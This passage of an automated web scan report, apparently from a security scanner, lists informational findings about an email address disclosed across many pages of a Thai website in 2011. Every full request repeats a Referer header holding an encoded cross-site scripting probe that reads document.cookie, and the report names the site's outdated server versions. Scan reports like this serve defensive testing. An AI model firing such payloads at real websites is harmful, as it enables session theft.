Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29480

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.46. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_search1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bg_search1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:08 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29480

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.47. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_about1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bt_about1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:59 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.48. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_agent1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bt_agent1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.49. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_education_center1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bt_education_center1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29490

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.50. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_home2.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bt_home2.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.51. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_news1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bt_news1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.52. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bt_service1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bt_service1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29481

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.53. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/cmd_search1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/cmd_search1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:43 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29481

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.54. http://www.ktam.co.th/en/index.php/ims/empty.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/empty.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/empty.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:43 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29475

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.55. http://www.ktam.co.th/en/index.php/ims/h_download1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/h_download1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/h_download1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29481

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.56. http://www.ktam.co.th/en/index.php/ims/h_link1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/h_link1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/h_link1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:44 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.57. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_acrobat.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/i_acrobat.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:48 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.58. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_firefox.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/i_firefox.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:49 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29479

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.59. http://www.ktam.co.th/en/index.php/ims/i_flash.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_flash.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/i_flash.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:49 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.60. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/i_winmedia.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/i_winmedia.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:51 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29480

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.61. http://www.ktam.co.th/en/index.php/ims/mails.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/mails.png

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/mails.png HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29475

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.62. http://www.ktam.co.th/en/index.php/ims/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/news.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/news.php HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:22 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
